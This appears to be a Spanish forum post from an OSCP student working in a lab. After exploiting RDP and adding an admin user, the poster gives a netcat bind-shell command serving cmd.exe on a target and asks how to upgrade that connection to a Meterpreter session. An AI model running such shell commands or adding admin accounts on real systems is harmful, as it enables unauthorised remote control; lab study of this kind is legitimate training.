¡Lo he intentado durante horas y no he podido hacer algo que debería ser simple!
Tengo una caja con admin (tomando OSCP - nada ilegal). Utilicé un exploit de RDP, obtuve un shell, agregué un usuario, coloqué al usuario en el grupo de administradores y, como me siento, actualmente estoy en un escritorio con un administrador.
Dado - OBJETIVO - 192.168.1.200, tengo un shell de administrador y acceso a rdesktop. Han subido nc.exe
KALI - Mi máquina - 192.168.1.100.
Lo que estoy tratando de hacer es abrir un puerto LISTENING en el TARGET ... c: \ nc -lvp 9999 -e c: \ windows \ system32 \ cmd.exe
... conéctese a ese puerto abierto desde mi caja KALI mientras usa el marco metasploit. Puedo conectarme usando nc 192.168.1.2009999, pero no puedo hacer que la conexión sea una sesión de metasploit.
Luego convierta esta conexión en una sesión de meterpreter usando post / multi / manage / shell_to_meterpreter
¡Gracias!